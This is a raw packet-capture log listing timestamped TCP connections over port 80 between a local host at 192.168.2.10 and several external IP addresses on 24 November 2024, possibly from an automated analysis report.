Nov 24, 2024 08:14:09.805939913 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.806015968 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.806047916 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.809209108 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.809262037 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.809281111 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.812434912 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.812515020 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.812541962 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.855051994 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.877446890 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.877537012 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.877659082 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.878701925 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.878781080 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.878833055 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.881165981 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.881293058 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.881357908 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.883673906 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.883781910 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.883944988 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.886178017 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.886267900 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.886353016 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.888619900 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.888752937 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.888834000 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.890996933 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.891102076 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.891208887 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.893394947 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.893465996 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.893577099 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.895771980 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.895823956 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.895910025 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.898006916 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.898130894 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.898220062 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.900223970 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.900296926 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.900403976 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.902481079 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.902601957 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.902678013 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.904671907 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.904788017 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.904864073 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.906882048 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.907010078 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.907092094 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.909082890 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.909202099 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.909337044 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.911263943 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.911377907 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.911462069 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.913399935 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.913507938 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.913573980 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.915568113 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.915671110 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.915729046 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.917670965 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.917782068 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.917829037 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.919735909 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.919817924 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.919887066 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.921816111 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.921982050 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.922034025 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.923876047 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.923988104 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.924036980 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.925879002 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.925995111 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.926064968 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.927916050 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.928083897 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.928141117 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.929888010 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.930109024 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.930155993 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.931880951 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.931898117 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.931952000 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.933815956 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.933958054 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.934025049 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.935791016 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.935923100 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.935975075 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.937772036 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.937860966 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.937910080 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.938950062 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.939055920 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.939106941 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.940092087 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.940211058 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.940254927 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.941297054 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.941448927 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.941498041 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.942447901 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.942554951 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.942606926 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.943603039 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.943708897 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.943753958 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.944802046 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.944942951 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.944998026 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.946018934 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.946386099 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.946451902 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.947165012 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.947309971 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.947357893 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.948369980 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.948550940 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.948602915 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.949546099 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.949678898 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.949733973 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.950614929 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.950731039 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.950819016 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.951803923 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.951925039 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.951984882 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.952974081 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.953121901 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.953628063 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.954158068 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.954375029 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.954451084 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.955420017 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.955446005 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.955508947 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.956537962 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.956792116 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.956839085 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.957623959 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.957761049 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.957811117 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.958926916 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.959043026 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.959088087 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.959995031 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.960287094 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.960335016 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.961188078 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:09.961247921 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:09.965823889 CET  49904  80     192.168.2.10    31.31.196.177
Nov 24, 2024 08:14:10.086221933 CET  80     49904  31.31.196.177   192.168.2.10
Nov 24, 2024 08:14:15.382498980 CET  49923  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:15.502096891 CET  80     49923  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:15.502182007 CET  49923  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:15.518095016 CET  49923  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:15.637702942 CET  80     49923  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:16.693907976 CET  80     49923  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:16.694001913 CET  49923  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:17.027096987 CET  49923  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:17.146608114 CET  80     49923  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:18.046066999 CET  49929  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:18.166790009 CET  80     49929  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:18.166871071 CET  49929  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:18.182549953 CET  49929  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:18.302443981 CET  80     49929  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:19.265098095 CET  80     49929  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:19.265178919 CET  49929  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:19.698875904 CET  49929  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:19.818399906 CET  80     49929  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:20.718084097 CET  49936  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:20.837661982 CET  80     49936  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:20.837819099 CET  49936  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:20.851950884 CET  49936  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:20.971554995 CET  80     49936  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:20.971596003 CET  80     49936  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:22.031680107 CET  80     49936  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:22.031897068 CET  49936  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:22.355091095 CET  49936  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:22.474606037 CET  80     49936  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:23.373925924 CET  49943  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:23.493516922 CET  80     49943  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:23.493678093 CET  49943  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:23.503890038 CET  49943  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:23.623440981 CET  80     49943  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:24.686172009 CET  80     49943  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:24.686278105 CET  80     49943  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:24.686321020 CET  49943  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:24.688894033 CET  49943  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:24.808305979 CET  80     49943  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:30.161731958 CET  49959  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:30.281285048 CET  80     49959  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:30.281590939 CET  49959  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:30.302067041 CET  49959  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:30.421792984 CET  80     49959  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:31.429548025 CET  80     49959  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:31.429610968 CET  49959  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:31.808275938 CET  49959  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:31.927762032 CET  80     49959  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:32.826975107 CET  49967  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:32.946557999 CET  80     49967  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:32.946712017 CET  49967  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:32.961981058 CET  49967  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:33.081538916 CET  80     49967  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:34.049243927 CET  80     49967  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:34.051747084 CET  49967  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:34.464545965 CET  49967  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:34.584183931 CET  80     49967  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:35.483648062 CET  49974  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:35.603177071 CET  80     49974  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:35.603265047 CET  49974  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:35.619338989 CET  49974  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:35.738962889 CET  80     49974  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:35.739007950 CET  80     49974  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:36.792979956 CET  80     49974  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:36.793045998 CET  49974  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:37.120794058 CET  49974  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:37.240283012 CET  80     49974  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:38.139600039 CET  49980  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:38.259099007 CET  80     49980  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:38.259305000 CET  49980  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:38.268861055 CET  49980  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:38.388334036 CET  80     49980  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:39.452709913 CET  80     49980  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:39.452750921 CET  80     49980  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:39.454457045 CET  49980  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:39.455668926 CET  49980  80     192.168.2.10    13.248.169.48
Nov 24, 2024 08:14:39.575203896 CET  80     49980  13.248.169.48   192.168.2.10
Nov 24, 2024 08:14:45.783289909 CET  49987  80     192.168.2.10    107.167.84.42
Nov 24, 2024 08:14:45.903115988 CET  80     49987  107.167.84.42   192.168.2.10
Nov 24, 2024 08:14:45.903310061 CET  49987  80     192.168.2.10    107.167.84.42
Nov 24, 2024 08:14:45.918659925 CET  49987  80     192.168.2.10    107.167.84.42
Nov 24, 2024 08:14:46.038142920 CET  80     49987  107.167.84.42   192.168.2.10
Nov 24, 2024 08:14:47.154764891 CET  80     49987  107.167.84.42   192.168.2.10
Nov 24, 2024 08:14:47.154863119 CET  80     49987  107.167.84.42   192.168.2.10
Nov 24, 2024 08:14:47.154875994 CET  80     49987  107.167.84.42   192.168.2.10
Nov 24, 2024 08:14:47.155030012 CET  49987  80     192.168.2.10    107.167.84.42
Nov 24, 2024 08:14:47.433361053 CET  49987  80     192.168.2.10    107.167.84.42
Nov 24, 2024 08:14:48.452513933 CET  49988  80     192.168.2.10    107.167.84.42
Nov 24, 2024 08:14:48.572031975 CET  80     49988  107.167.84.42   192.168.2.10
Nov 24, 2024 08:14:48.572278023 CET  49988  80     192.168.2.10    107.167.84.42
Nov 24, 2024 08:14:48.589859962 CET  49988  80     192.168.2.10    107.167.84.42
Nov 24, 2024 08:14:48.709479094 CET  80     49988  107.167.84.42   192.168.2.10
Nov 24, 2024 08:14:49.821301937 CET  80     49988  107.167.84.42   192.168.2.10
Nov 24, 2024 08:14:49.821337938 CET  80     49988  107.167.84.42   192.168.2.10
Nov 24, 2024 08:14:49.821422100 CET  80     49988  107.167.84.42   192.168.2.10
Nov 24, 2024 08:14:49.821494102 CET  49988  80     192.168.2.10    107.167.84.42
Nov 24, 2024 08:14:49.821535110 CET  49988  80     192.168.2.10    107.167.84.42
Nov 24, 2024 08:14:50.105189085 CET  49988  80     192.168.2.10    107.167.84.42
Nov 24, 2024 08:14:51.124243021 CET  49989  80     192.168.2.10    107.167.84.42
Nov 24, 2024 08:14:51.243854046 CET  80     49989  107.167.84.42   192.168.2.10
Nov 24, 2024 08:14:51.243941069 CET  49989  80     192.168.2.10    107.167.84.42
Nov 24, 2024 08:14:51.263487101 CET  49989  80     192.168.2.10    107.167.84.42
Nov 24, 2024 08:14:51.383223057 CET  80     49989  107.167.84.42   192.168.2.10
Nov 24, 2024 08:14:51.383384943 CET  80     49989  107.167.84.42   192.168.2.10
Nov 24, 2024 08:14:52.450073004 CET  80     49989  107.167.84.42   192.168.2.10
Nov 24, 2024 08:14:52.450131893 CET  80     49989  107.167.84.42   192.168.2.10
Nov 24, 2024 08:14:52.450161934 CET  80     49989  107.167.84.42   192.168.2.10
Nov 24, 2024 08:14:52.450186968 CET  49989  80     192.168.2.10    107.167.84.42
Nov 24, 2024 08:14:52.450202942 CET  80     49989  107.167.84.42   192.168.2.10
Nov 24, 2024 08:14:52.450263977 CET  49989  80     192.168.2.10    107.167.84.42
Nov 24, 2024 08:14:52.777169943 CET  49989  80     192.168.2.10    107.167.84.42
Nov 24, 2024 08:14:53.796397924 CET  49990  80     192.168.2.10    107.167.84.42
Nov 24, 2024 08:14:53.916181087 CET  80     49990  107.167.84.42   192.168.2.10
Nov 24, 2024 08:14:53.916480064 CET  49990  80     192.168.2.10    107.167.84.42
Nov 24, 2024 08:14:53.929368973 CET  49990  80     192.168.2.10    107.167.84.42
Nov 24, 2024 08:14:54.049005985 CET  80     49990  107.167.84.42   192.168.2.10
Nov 24, 2024 08:14:55.212100983 CET  80     49990  107.167.84.42   192.168.2.10
Nov 24, 2024 08:14:55.212182999 CET  80     49990  107.167.84.42   192.168.2.10
                                                            Nov 24, 2024 08:14:55.212229967 CET8049990107.167.84.42192.168.2.10
                                                            Nov 24, 2024 08:14:55.212394953 CET4999080192.168.2.10107.167.84.42
                                                            Nov 24, 2024 08:14:55.215215921 CET4999080192.168.2.10107.167.84.42
                                                            Nov 24, 2024 08:14:55.334939003 CET8049990107.167.84.42192.168.2.10
                                                            Nov 24, 2024 08:15:00.929764032 CET4999180192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:01.049551964 CET8049991209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:01.049808025 CET4999180192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:01.068685055 CET4999180192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:01.188349009 CET8049991209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:02.331581116 CET8049991209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:02.331676006 CET8049991209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:02.331782103 CET4999180192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:02.574071884 CET4999180192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:03.592736006 CET4999280192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:03.712352037 CET8049992209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:03.712626934 CET4999280192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:03.728972912 CET4999280192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:03.848644018 CET8049992209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:05.065916061 CET8049992209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:05.066054106 CET8049992209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:05.066976070 CET4999280192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:05.230453968 CET4999280192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:06.250300884 CET4999380192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:06.370079041 CET8049993209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:06.370193958 CET4999380192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:06.389189005 CET4999380192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:06.508852005 CET8049993209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:06.508889914 CET8049993209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:07.607530117 CET8049993209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:07.607743979 CET8049993209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:07.607805967 CET4999380192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:07.907182932 CET4999380192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:08.931087017 CET4999480192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:09.050868034 CET8049994209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:09.050987959 CET4999480192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:09.061122894 CET4999480192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:09.180732012 CET8049994209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:10.272936106 CET8049994209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:10.272958994 CET8049994209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:10.273169041 CET4999480192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:10.276249886 CET4999480192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:10.395680904 CET8049994209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:15.712435007 CET4999580192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:15.832197905 CET8049995104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:15.833750010 CET4999580192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:15.848953962 CET4999580192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:15.968602896 CET8049995104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:16.991203070 CET8049995104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:16.991595030 CET8049995104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:16.991662979 CET4999580192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:17.355362892 CET4999580192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:18.380563021 CET4999680192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:18.500355959 CET8049996104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:18.500543118 CET4999680192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:18.515841961 CET4999680192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:18.635412931 CET8049996104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:19.655185938 CET8049996104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:19.655673981 CET8049996104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:19.655807018 CET4999680192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:20.027282953 CET4999680192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:21.046324968 CET4999780192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:21.166006088 CET8049997104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:21.166322947 CET4999780192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:21.181832075 CET4999780192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:21.302249908 CET8049997104.21.44.16192.168.2.10
